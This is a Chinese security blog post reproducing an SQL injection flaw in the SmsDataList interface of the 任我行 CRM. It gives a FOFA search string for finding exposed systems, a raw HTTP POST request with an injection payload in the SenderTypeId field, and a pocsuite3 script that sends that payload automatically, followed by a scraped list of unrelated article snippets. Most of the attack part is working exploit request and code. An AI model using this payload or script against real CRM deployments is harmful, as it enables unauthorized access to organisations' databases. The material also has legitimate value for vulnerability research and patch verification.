炼金术师诸葛亮
炼金术师诸葛亮

漏洞复现-任我行CRM系统SmsDataList接口SQL注入漏洞(附漏洞检测脚本)

免责声明

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

漏洞描述

系统SmsDataList接口存在SQL注入漏洞漏洞复现-任我行CRM系统SmsDataList接口SQL注入漏洞(附漏洞检测脚本)_第1张图片

fofa语句

"欢迎使用任我行CRM"

poc加检测

POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded

Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=0000000000'and 1=convert(int,(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123456')))) AND 'CvNI'='CvNI

漏洞复现-任我行CRM系统SmsDataList接口SQL注入漏洞(附漏洞检测脚本)_第2张图片

poc脚本

脚本使用pocsuite框架

# _*_ coding:utf-8 _*_
# @Time : 2024/1/3

from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str


class rwx_crm_smsdatalist_sql(POCBase):
    pocDesc = '''任我行CRM系统SmsDataList接口SQL注入漏洞'''
    author = '炼金术师诸葛亮'
    createDate = '2024-01-03'
    name = '任我行CRM系统SmsDataList接口SQL注入漏洞'

    def _verify(self):

        result = {}
        path = """/SMS/SmsDataList/?pageIndex=1&pageSize=30"""
        headers = {
            "User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)",
            "Accept": "*/*",
            "Content-Type": 'application/x-www-form-urlencoded',
            'Connection': 'Keep-Alive'
        }
        url = self.url + path
        data = "Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=0000000000'and 1=convert(int,(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123456')))) AND 'CvNI'='CvNI"

        try:
            response = requests.post(url, headers=headers, data=data, verify=False)
            if response.status_code == 200 and 'dc3949ba59ab' in response.text:
                result['VerifyInfo'] = {}

            return self.parse_output(result)
        except Exception as e:
            pass


register_poc(rwx_crm_smsdatalist_sql)

脚本利用

漏洞复现-任我行CRM系统SmsDataList接口SQL注入漏洞(附漏洞检测脚本)_第3张图片

你可能感兴趣的:(安全,web安全)

  • 【如何设置ssh免密登录】 岁月玲珑 linuxsshgithubgit
    设置SSH免密登录能够让你在不输入密码的情况下,通过SSH协议安全登录远程服务器。下面为你详细介绍设置步骤:1.生成SSH密钥对(若未生成)要生成SSH密钥对,可在本地终端执行以下命令:ssh-keygen-trsa-b4096-C"[email protected]"当系统提示你“Enterafileinwhichtosavethekey”时,你可以直接按回车键使用默认文件位置,也可以
  • 【WCF】通过AOP实现基于JWT的授权与鉴权的实践 ArabySide #WCFjwtwcfaopc#
    系列文章目录链接:【WCF】基于WCF在WinForms搭建RESTful服务指南链接:【WCF】单例模式的线程安全缓存管理器实现,给你的WebApi加入缓存吧链接:【WCF】基于固定时间窗口的接口限流实现(借助IOperationInvoker的AOP方案)链接:【WCF】通过AOP实现基于JWT的授权与鉴权的实践文章目录系列文章目录写在前面一、JWT(JSONWebToken)1.1什么是JW
  • 网络请求——微信小程序学习笔记 十年之少 微信小程序学习笔记微信小程序学习笔记
    1.前言发起网络请求,即发起HTTPS网络请求,注意必须是HTTPS。2.使用前注意事项使用前注意事项可参考官网文档:基础能力/网络/使用说明简单的来说,为了安全,服务器域名必须要备案,如果只是想测试一下,可以设置项目属性中设置不校验域名。2.1测试版-项目配置不校验域名微信开发者工具中打开需要配置的项目,点击【详情】,选择【本地设置】,勾选【不校验合法域名……】。2.2配置request合法域名
  • Apache HTTP Server部署全攻略 Sally璐璐 运维apachehttp网络协议运维
    httpd简介httpd(ApacheHTTPServer)是一款历史悠久的开源Web服务器软件,由Apache软件基金会开发和维护。自1995年首次发布以来,Apache一直是Web服务器领域的领导者,以其稳定性、安全性和灵活性著称。根据W3Techs的最新统计,httpd支持着全球超过40%的网站运行,特别是在企业级应用中占据重要地位。httpd的主要特点包括:模块化架构:通过动态加载模块扩展
  • 作为创业者,DeepSeek爆火带来的七点启示 墨菲安全 人工智能DeepSeek软件供应链安全
    这个春节DeepSeek真的是火到不行,什么概念呢?当年某大厂春晚砸了20多个亿的营销费用,所带来的影响力和品牌曝光可能不及DeepSeek在这个春节期间的1/2。DeepSeek不仅出圈了,而且是形成了全球影响力。我们墨菲安全也是一家在行业内并没有太高知名度的创业公司,也是在埋头做产品的阶段。DeepSeek这个事情对我们的触动是非常之大的,甚至我都开始认为DeepSeek这一代的企业和企业家们
  • 剖析美国政府视角下的ICT供应链安全 墨菲安全 网络安全软件供应链
    2018年11月15日,美国国土安全部(DHS)宣布成立了信息和通信技术(ICT)供应链风险管理(SCRM)工作组,这个工作组是由美国多个政府部门、IT行业企业代表及通信行业企业代表联合成立的。该组织对外宣传的目标是识别和管理全球ICT供应链的风险。之后该组织非常活跃,2024年2月6日,该组织刚刚宣布将工作组延长两年。我们翻阅了该组织从成立至今参与和主导发布的大量文章,从这里面可以发现该组织对于
  • 墨菲安全在软件供应链安全领域阶段性总结及思考
    向外看:墨菲安全在软件供应链安全领域的一些洞察、思考、行动洞察现状&挑战:过去开发安全体系是无法解决软件供应链安全问题的;一些过去专注开发安全领域的厂商正在错误的引导行业用开发安全思维解决软件供应链安全问题,治标不治本;这导致行业(安全厂商/企业/监管)大部分人对于软件供应链安全仍然缺乏理性的认知;过去以开发安全为主营业务的安全厂商将越来越无法适应软件供应链安全领域日益成熟的市场需求;正在发生的:
  • 网络编程(17)——asio多线程模型IOThreadPool 爱吃土豆zzz 网络编程单例模式c++网络编程asio
    十七、day17之前我们介绍了IOServicePool的方式,一个IOServicePool开启n个线程和n个iocontext,每个线程内独立运行iocontext,各个iocontext监听各自绑定的socket是否就绪,如果就绪就在各自线程里触发回调函数。为避免线程安全问题,我们将网络数据封装为逻辑包投递给逻辑系统,逻辑系统有一个单独线程处理,这样将网络IO和逻辑处理解耦合,极大的提高了服
  • iOS安全和逆向系列教程 第1篇: iOS逆向工程概述与学习路线图 自学不成才 iOS安全和逆向系列教程ios学习cocoa
    iOS安全和逆向系列教程第1篇:iOS逆向工程概述与学习路线图欢迎各位加入我的iOS逆向工程专栏!在这个系列的第一篇文章中,我将为大家介绍iOS逆向工程的基本概念、应用场景以及完整的学习路线图,帮助大家建立清晰的学习框架。什么是iOS逆向工程?逆向工程(ReverseEngineering)是一种通过分析已有产品(如软件、硬件)来理解其设计、功能和工作原理的过程。在iOS领域,逆向工程特指通过各种
  • C++ 泛型编程利器:模板机制 筏.k c++知识点c++算法开发语言
    C++泛型编程利器:模板机制全解析——类型安全与代码复用的完美结合(含实战陷阱)更新时间:2025年6月19日️标签:C++|模板|泛型编程|函数模板|类模板|C++基础文章目录前言一、基础概念:C++模板1.什么是模板2.模板的作用二、语法详解:模板的实现1.函数模板1.1基本语法1.2多类型参数1.3非类型参数2.类模板2.1基本语法2.2模板特化2.3偏特化3.2类型推导⚠️三、常见陷阱陷阱
  • 欢乐熊大话蓝牙知识24:LE Secure Connections 是 BLE 的安全升级术 欢乐熊嵌入式编程 欢乐熊大话蓝牙知识安全BLE蓝牙低功耗蓝牙LESecureGATT蓝牙
    《LESecureConnections是BLE的安全升级术》还在用JustWorks?你家智能锁可能比你家门还容易被打开。今天我们来聊聊BLE中的“防身绝技”——LESecureConnections(LESC),它到底有多安全?又该怎么用?一、LESecureConnections是啥?一句话解释:LESecureConnections是BLE自4.2版本引入的“升级配对方式”,它不再是“小打
  • Web学习:SQL注入之联合查询注入 kaikaile1995 前端学习sql
    SQL注入(SQLInjection)是一种常见且危害极大的Web安全漏洞,攻击者可以通过构造恶意的SQL语句窃取、篡改数据库中的数据,甚至控制整个数据库服务器。本文将深入探讨SQL注入的一个重要变种——联合查询注入(Union-basedSQLInjection),介绍其原理、常见攻击方式、以及防御措施。SQL注入概述SQL注入是指将恶意的SQL代码插入到应用程序的输入字段中,使得这些代码被意外
  • C++实现单例模式 cxpxatu521 C++设计模式c++设计模式
    C++实现单例模式单例模式的定义:第一种实现方式:饿汉模式1.适用场景2.优缺点3.是否线程安全4.c++代码实现第二种实现方式:懒汉模式1.适用场景2.优缺点3.是否是线程安全的4.代码实现5.懒汉模式在Linux环境下的实现单例模式的定义:一种创建类型的设计模式,通过单例模式的方法创建的类只能有一个实例,也就是说一个类只能创建一个对象。根据实现方式的不同,又可以分为饿汉模式和懒汉模式第一种实现
  • [ vulhub漏洞复现篇 ] Drupal XSS漏洞 (CVE-2019-6341) 寒蝉听雨[原ID_PowerShell] [靶场实战]vulhubvulhub漏洞复现DrupalXSS漏洞CVE-2019-6341渗透测试网络安全
    博主介绍‍博主介绍:大家好,我是_PowerShell,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!文章目录博主介绍一、漏洞编号二、影响范围三、漏洞描述四、环境搭建1、进入CVE-2019-6341环境2、启动CVE-20
  • 高防CDN:网络安全的“盾牌”与加速利器 上海云盾-高防顾问 web安全网络安全
    在数字化时代,网络安全和访问速度是网站运营的两大核心挑战。尤其是面对日益频繁的DDoS攻击和全球用户对快速访问的需求,高防CDN(高防御内容分发网络)成为企业和开发者的重要选择。本文将用通俗易懂的方式,解析高防CDN的概念及其工作原理。什么是高防CDN?高防CDN是融合了CDN加速与DDoS防护能力的网络安全服务。它不仅通过全球分布的节点缓存内容,提升用户访问速度,还能识别并抵御大规模流量攻击(如
  • 揭秘网络安全:数字世界的隐形防线
    目录一、网络安全:数字时代的关键锁钥二、常见网络安全威胁大起底2.1网络诈骗:狡猾的数字陷阱2.2恶意软件:隐匿的数字刺客2.3数据泄露:隐私的无声暴露2.4网络钓鱼:伪装的数字猎手三、筑牢网络安全防线的策略3.1提升安全意识:思想上的防火墙3.2强化密码管理:账户的坚固盾牌3.3谨慎使用公共网络:公共场合的安全警惕3.4定期更新软件和系统:修复漏洞的及时补丁3.5开启防护工具:数字世界的安全卫士
  • 地理信息安全与隐私保护:守护你我位置的隐形盾牌 GeoSaaS 地理信息网络安全物联网无人机机器人gis智慧城市
    在数字时代,地理信息技术如地理信息系统(GIS)和全球定位系统(GPS)已成为日常生活不可或缺的一部分,它们为我们带来便利的同时,也悄然触及个人隐私的敏感地带。今天,我们就来聊聊地理信息收集和使用中的隐私保护,如何在享受科技福利的同时,确保个人信息的安全无虞。个人隐私为何重要?个人隐私是每个人的基本权利,它关乎个人自由、尊严与安全。地理信息,如行踪记录、家庭住址等,一旦泄露,可能导致身份盗用、骚扰
  • 如何禁止GPTBot等爬虫爬取网站内容:保护数据安全的实用指南 淮橘√ 人工智能
    引言随着人工智能技术的快速发展,网络爬虫(如OpenAI的GPTBot、GoogleBot、Anthropic的ClaudeBot等)被广泛用于抓取网站数据以训练AI模型或索引内容。然而,部分网站管理员可能不希望自己的内容被爬虫抓取,原因包括保护原创内容、降低服务器负载或防止数据被滥用。一、为什么需要禁止爬虫?网络爬虫可能带来以下问题:内容盗用风险:原创内容可能被AI模型或其他服务未经授权使用。服
  • 宝塔面板10.0新版本公测特色功能深度解析 淮橘√ 运维服务器
    引言宝塔面板(BTPanel)作为一款广受欢迎的服务器管理工具,以其简洁的界面和强大的功能深受运维人员和站长的喜爱。2025年,宝塔面板迎来了10.0版本的重大更新,带来了多项创新功能和性能优化,进一步提升了服务器管理的效率和安全性。一、宝塔面板10.0版本概览宝塔面板10.0是继9.x系列后的重大版本升级,官方于2025年初发布(具体日期以官网为准,参考宝塔官网及论坛)。新版本在界面设计、功能扩
  • 网络安全:构建数字世界的坚实防线
    文章目录网络安全:构建数字世界的坚实防线一、网络安全的重要性1.保护个人隐私2.维护商业利益3.保障国家安全4.防止经济犯罪5.确保业务连续性二、网络安全现状1.数据泄露频发2.隐私保护堪忧3.网络犯罪猖獗三、网络安全防范措施1.密码管理2.个人信息保护3.安全软件和更新4.网络访问控制5.数据备份和恢复6.培养安全意识四、未来展望1.技术创新2.法规完善3.国际合作4.社会共治网络安全:构建数字
  • 用户实体行为分析与数据异常访问联防方案 KKKlucifer 时序数据库
    一、用户实体行为分析(UEBA)技术概述1.1定义与概念用户实体行为分析(UEBA)是一种高级网络安全方法,它利用机器学习和行为分析技术,对用户、设备、应用程序等实体在网络环境中的行为进行深入分析,以检测出异常行为和潜在的安全威胁。UEBA的核心在于通过建立行为基线,识别出偏离正常行为模式的活动,从而发现那些传统安全工具难以检测到的高级、隐藏和内部威胁。1.2工作原理UEBA系统通过收集来自多个数
  • 动态脱敏引擎设计:基于上下文感知的字段级权限控制模型
    在数据流通日益频繁的数字化时代,敏感数据泄露风险持续攀升。传统脱敏技术多采用静态规则,难以适应复杂多变的业务场景,导致数据保护与业务需求间矛盾突出。动态脱敏引擎基于上下文感知的字段级权限控制模型,通过实时分析数据访问场景,实现对敏感字段的精细化权限管理与动态脱敏处理,为数据安全流通提供有效保障。一、核心痛点与需求分析1.1传统脱敏技术的局限性静态脱敏规则难以应对动态业务需求,存在过度脱敏影响数据可
  • 页面通信的方式 :postMessage向指定窗口发送信息 呼叫6945 javascript页面通信
    postMessage是HTML5引入的一个跨文档通信API,允许不同窗口或iframe之间安全地发送消息。通过postMessage,你可以向指定的窗口或iframe发送信息,并且接收方可以通过监听message事件来接收这些信息。使用方法发送消息targetWindow.postMessage(message,targetOrigin,[transfer]);targetWindow:目标窗口
  • 筑牢医疗AI安全防线:四重防护体系全解析 Allen_Lyb 数智化教程(第二期)人工智能安全
    一、引言:医疗AI发展中的安全困境在数字化浪潮席卷下,医疗领域正经历着一场由人工智能(AI)驱动的深刻变革。医疗AI凭借其强大的数据分析与处理能力,在疾病诊断、药物研发、健康管理等诸多环节展现出巨大潜力,成为推动医疗行业进步的关键力量。而这一切的背后,医疗数据作为AI发展的“燃料”,以及AI算力作为运行的“引擎”,起着不可或缺的核心作用。医疗数据涵盖了患者从基本信息、病史、症状描述到各种检查检验报
  • 鸿蒙应用开发:多线程性能优化技巧 操作系统内核探秘 操作系统内核揭秘harmonyos性能优化华为ai
    鸿蒙应用开发:多线程性能优化技巧关键词:HarmonyOS、多线程编程、性能优化、线程调度、并发控制、异步编程、内存管理摘要:本文深入解析鸿蒙应用开发中的多线程性能优化技术,系统阐述HarmonyOS线程模型的核心机制,包括轻量级任务(LWT)、线程池架构、调度策略等关键技术点。通过具体代码示例和数学模型分析,详细讲解线程安全控制、异步任务处理、资源竞争解决方案,结合项目实战演示如何通过合理的线程
  • 2025年网络安全研究生选择哪个方向有前景? ~小羊没烦恼~ 网络安全黑客技术黑客web安全安全开发语言网络学习
    写在前面网络空间安全专业越来越受到国家政策的支持;而滴滴APP泄露个人隐私等事件,也使得大众的安全意识和安全需求前所未有的提高。在这样的环境下,越来越多的同学想要攻读网络安全专业,那么问题来了,网安研究生哪个方向更具有前景呢?网安方向介绍BAOYAN首先我们一起来了解一下网络空间安全专业有哪些方向,以及每个方向所需要的基础能力。网安大体可分为5个子方向,分别为密码学与应用安全、量子信息安全、数据安
  • 微信办公泄密频发?企业如何兼顾效率与安全?如方工程文控给出答案! Ru_fang 安全网络大数据
    引言在数字化办公日益普及的今天,信息安全管理成为企业不可忽视的重要课题。尽管便捷的即时通讯工具为工作带来了效率提升,但随之而来的数据泄露风险也日益凸显。近期,某单位因员工通过微信传输涉密文件导致全员追责的事件,再次为企业敲响了警钟。如何在享受移动办公便利的同时,有效规避信息安全风险?工程文控系统通过技术手段为企业构建了可靠的安全防护体系。一、移动办公的潜在风险:常见误区剖析1.“私发或群发无风险”
  • 【高效又安全】2025年企业文件摆渡必备指南 CookieCrusher 安全运维
    在数字化办公深度渗透的2025年,企业核心数据频繁穿梭于研发网、生产网、办公网乃至外部合作方网络之间。然而,传统的文件传输方式正成为巨大隐患:用网盘/IM传机密?审批缺失、权限失控,敏感设计图转瞬流入竞争对手邮箱。靠FTP服务器中转?病毒入侵、未授权访问频发,生产系统面临瘫痪风险。让员工手动“摆渡”?U盘拷贝效率低下且审计困难,重要合同版本丢失追责无门。文件摆渡系统应运而生,成为隔离网络间安全传输
  • 解决web服务中在线查看minio上文件提示CORS的问题 Hong.1948 前端网络javascript
    web页面访问excel、word之类的文件时,由于浏览器的安全机制,如果目标地址和源地址不同源,就会报CORS,即跨域访问的问题。解决跨域的问题,主要有2个思路:方案1:修改目标服务的CORS策略,允许跨域访问方案2:强行同源,然后使用nginx转发请求。此前使用s3服务的时候,使用方案1解决了跨域访问的问题。s3服务,不管是客户端还是pythonsdk,都可以直接修改指定桶的CORS策略,配置
  • Vue3 中watch和computed 行云&流水 Vue3typescript前端vue.jsjavascript前端
    Vue3中computed与watch深度解析在Vue3组合中,响应式工具的类型安全使用至关重要。以下是详细说明一、watch侦听器1.基础类型监听实际参数1={{count}}点击import{reactive,ref,watch}from"vue";constcount=ref(0)conststate=reactive({items:[]asstring[]});watch(count,(n
  • java类加载顺序 3213213333332132 java
    package com.demo; /** * @Description 类加载顺序 * @author FuJianyong * 2015-2-6上午11:21:37 */ public class ClassLoaderSequence { String s1 = "成员属性"; static String s2 = "
  • Hibernate与mybitas的比较 BlueSkator sqlHibernate框架ibatisorm
    第一章     Hibernate与MyBatis Hibernate 是当前最流行的O/R mapping框架,它出身于sf.net,现在已经成为Jboss的一部分。 Mybatis 是另外一种优秀的O/R mapping框架。目前属于apache的一个子项目。 MyBatis 参考资料官网:http:
  • php多维数组排序以及实际工作中的应用 dcj3sjt126com PHPusortuasort
    自定义排序函数返回false或负数意味着第一个参数应该排在第二个参数的前面, 正数或true反之, 0相等usort不保存键名uasort 键名会保存下来uksort 排序是对键名进行的 <!doctype html> <html lang="en"> <head> <meta charset="utf-8&q
  • DOM改变字体大小 周华华 前端
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml&q
  • c3p0的配置 g21121 c3p0
    c3p0是一个开源的JDBC连接池,它实现了数据源和JNDI绑定,支持JDBC3规范和JDBC2的标准扩展。c3p0的下载地址是:http://sourceforge.net/projects/c3p0/这里可以下载到c3p0最新版本。 以在spring中配置dataSource为例: <!-- spring加载资源文件 --> <bean name="prope
  • Java获取工程路径的几种方法 510888780 java
    第一种: File f = new File(this.getClass().getResource("/").getPath()); System.out.println(f); 结果: C:\Documents%20and%20Settings\Administrator\workspace\projectName\bin 获取当前类的所在工程路径; 如果不加“
  • 在类Unix系统下实现SSH免密码登录服务器 Harry642 免密ssh
    1.客户机     (1)执行ssh-keygen -t rsa -C "[email protected]"生成公钥,xxx为自定义大email地址     (2)执行scp ~/.ssh/id_rsa.pub root@xxxxxxxxx:/tmp将公钥拷贝到服务器上,xxx为服务器地址     (3)执行cat
  • Java新手入门的30个基本概念一 aijuans javajava 入门新手
    在我们学习Java的过程中,掌握其中的基本概念对我们的学习无论是J2SE,J2EE,J2ME都是很重要的,J2SE是Java的基础,所以有必要对其中的基本概念做以归纳,以便大家在以后的学习过程中更好的理解java的精髓,在此我总结了30条基本的概念。  Java概述:  目前Java主要应用于中间件的开发(middleware)---处理客户机于服务器之间的通信技术,早期的实践证明,Java不适合
  • Memcached for windows 简单介绍 antlove javaWebwindowscachememcached
    1. 安装memcached server a. 下载memcached-1.2.6-win32-bin.zip b. 解压缩,dos 窗口切换到 memcached.exe所在目录,运行memcached.exe -d install c.启动memcached Server,直接在dos窗口键入 net start "memcached Server&quo
  • 数据库对象的视图和索引 百合不是茶 索引oeacle数据库视图
      视图     视图是从一个表或视图导出的表,也可以是从多个表或视图导出的表。视图是一个虚表,数据库不对视图所对应的数据进行实际存储,只存储视图的定义,对视图的数据进行操作时,只能将字段定义为视图,不能将具体的数据定义为视图       为什么oracle需要视图;    &
  • Mockito(一) --入门篇 bijian1013 持续集成mockito单元测试
            Mockito是一个针对Java的mocking框架,它与EasyMock和jMock很相似,但是通过在执行后校验什么已经被调用,它消除了对期望 行为(expectations)的需要。其它的mocking库需要你在执行前记录期望行为(expectations),而这导致了丑陋的初始化代码。  &nb
  • 精通Oracle10编程SQL(5)SQL函数 bijian1013 oracle数据库plsql
    /* * SQL函数 */ --数字函数 --ABS(n):返回数字n的绝对值 declare v_abs number(6,2); begin v_abs:=abs(&no); dbms_output.put_line('绝对值:'||v_abs); end; --ACOS(n):返回数字n的反余弦值,输入值的范围是-1~1,输出值的单位为弧度
  • 【Log4j一】Log4j总体介绍 bit1129 log4j
    Log4j组件:Logger、Appender、Layout   Log4j核心包含三个组件:logger、appender和layout。这三个组件协作提供日志功能: 日志的输出目标 日志的输出格式 日志的输出级别(是否抑制日志的输出)  logger继承特性 A logger is said to be an ancestor of anothe
  • Java IO笔记 白糖_ java
    public static void main(String[] args) throws IOException { //输入流 InputStream in = Test.class.getResourceAsStream("/test"); InputStreamReader isr = new InputStreamReader(in); Bu
  • Docker 监控 ronin47 docker监控
             目前项目内部署了docker,于是涉及到关于监控的事情,参考一些经典实例以及一些自己的想法,总结一下思路。 1、关于监控的内容 监控宿主机本身 监控宿主机本身还是比较简单的,同其他服务器监控类似,对cpu、network、io、disk等做通用的检查,这里不再细说。 额外的,因为是docker的
  • java-顺时针打印图形 bylijinnan java
    一个画图程序 要求打印出: 1.int i=5; 2.1 2 3 4 5 3.16 17 18 19 6 4.15 24 25 20 7 5.14 23 22 21 8 6.13 12 11 10 9 7. 8.int i=6 9.1 2 3 4 5 6 10.20 21 22 23 24 7 11.19
  • 关于iReport汉化版强制使用英文的配置方法 Kai_Ge iReport汉化英文版
    对于那些具有强迫症的工程师来说,软件汉化固然好用,但是汉化不完整却极为头疼,本方法针对iReport汉化不完整的情况,强制使用英文版,方法如下: 在 iReport 安装路径下的 etc/ireport.conf 里增加红色部分启动参数,即可变为英文版。   # ${HOME} will be replaced by user home directory accordin
  • [并行计算]论宇宙的可计算性 comsci 并行计算
          现在我们知道,一个涡旋系统具有并行计算能力.按照自然运动理论,这个系统也同时具有存储能力,同时具备计算和存储能力的系统,在某种条件下一般都会产生意识......       那么,这种概念让我们推论出一个结论     &nb
  • 用OpenGL实现无限循环的coverflow dai_lm androidcoverflow
    网上找了很久,都是用Gallery实现的,效果不是很满意,结果发现这个用OpenGL实现的,稍微修改了一下源码,实现了无限循环功能 源码地址: https://github.com/jackfengji/glcoverflow public class CoverFlowOpenGL extends GLSurfaceView implements GLSurfaceV
  • JAVA数据计算的几个解决方案1 datamachine javaHibernate计算
    老大丢过来的软件跑了10天,摸到点门道,正好跟以前攒的私房有关联,整理存档。 -----------------------------华丽的分割线-------------------------------------     数据计算层是指介于数据存储和应用程序之间,负责计算数据存储层的数据,并将计算结果返回应用程序的层次。J  &nbs
  • 简单的用户授权系统,利用给user表添加一个字段标识管理员的方式 dcj3sjt126com yii
    怎么创建一个简单的(非 RBAC)用户授权系统 通过查看论坛,我发现这是一个常见的问题,所以我决定写这篇文章。 本文只包括授权系统.假设你已经知道怎么创建身份验证系统(登录)。 数据库 首先在 user 表创建一个新的字段(integer 类型),字段名 'accessLevel',它定义了用户的访问权限 扩展 CWebUser 类 在配置文件(一般为 protecte
  • 未选之路 dcj3sjt126com
    作者:罗伯特*费罗斯特   黄色的树林里分出两条路, 可惜我不能同时去涉足, 我在那路口久久伫立, 我向着一条路极目望去, 直到它消失在丛林深处.   但我却选了另外一条路, 它荒草萋萋,十分幽寂; 显得更诱人,更美丽, 虽然在这两条小路上, 都很少留下旅人的足迹.   那天清晨落叶满地, 两条路都未见脚印痕迹. 呵,留下一条路等改日再
  • Java处理15位身份证变18位 蕃薯耀 18位身份证变15位15位身份证变18位身份证转换
      15位身份证变18位,18位身份证变15位 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 201
  • SpringMVC4零配置--应用上下文配置【AppConfig】 hanqunfeng springmvc4
    从spring3.0开始,Spring将JavaConfig整合到核心模块,普通的POJO只需要标注@Configuration注解,就可以成为spring配置类,并通过在方法上标注@Bean注解的方式注入bean。   Xml配置和Java类配置对比如下: applicationContext-AppConfig.xml   <!-- 激活自动代理功能 参看:
  • Android中webview跟JAVASCRIPT中的交互 jackyrong JavaScripthtmlandroid脚本
      在android的应用程序中,可以直接调用webview中的javascript代码,而webview中的javascript代码,也可以去调用ANDROID应用程序(也就是JAVA部分的代码).下面举例说明之: 1 JAVASCRIPT脚本调用android程序    要在webview中,调用addJavascriptInterface(OBJ,int
  • 8个最佳Web开发资源推荐 lampcy 编程Web程序员
    Web开发对程序员来说是一项较为复杂的工作,程序员需要快速地满足用户需求。如今很多的在线资源可以给程序员提供帮助,比如指导手册、在线课程和一些参考资料,而且这些资源基本都是免费和适合初学者的。无论你是需要选择一门新的编程语言,或是了解最新的标准,还是需要从其他地方找到一些灵感,我们这里为你整理了一些很好的Web开发资源,帮助你更成功地进行Web开发。 这里列出10个最佳Web开发资源,它们都是受
  • 架构师之面试------jdk的hashMap实现 nannan408 HashMap
    1.前言。   如题。 2.详述。   (1)hashMap算法就是数组链表。数组存放的元素是键值对。jdk通过移位算法(其实也就是简单的加乘算法),如下代码来生成数组下标(生成后indexFor一下就成下标了)。 static int hash(int h) { h ^= (h >>> 20) ^ (h >>>
  • html禁止清除input文本输入缓存 Rainbow702 html缓存input输入框change
    多数浏览器默认会缓存input的值,只有使用ctl+F5强制刷新的才可以清除缓存记录。 如果不想让浏览器缓存input的值,有2种方法: 方法一: 在不想使用缓存的input中添加 autocomplete="off";  <input type="text" autocomplete="off" n
  • POJO和JavaBean的区别和联系 tjmljw POJOjava beans
    POJO 和JavaBean是我们常见的两个关键字,一般容易混淆,POJO全称是Plain Ordinary Java Object / Pure Old Java Object,中文可以翻译成:普通Java类,具有一部分getter/setter方法的那种类就可以称作POJO,但是JavaBean则比 POJO复杂很多, Java Bean 是可复用的组件,对 Java Bean 并没有严格的规
  • java中单例的五种写法 liuxiaoling java单例
    /** * 单例模式的五种写法: * 1、懒汉 * 2、恶汉 * 3、静态内部类 * 4、枚举 * 5、双重校验锁 */ /** * 五、 双重校验锁,在当前的内存模型中无效 */ class LockSingleton { private volatile static LockSingleton singleton; pri
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他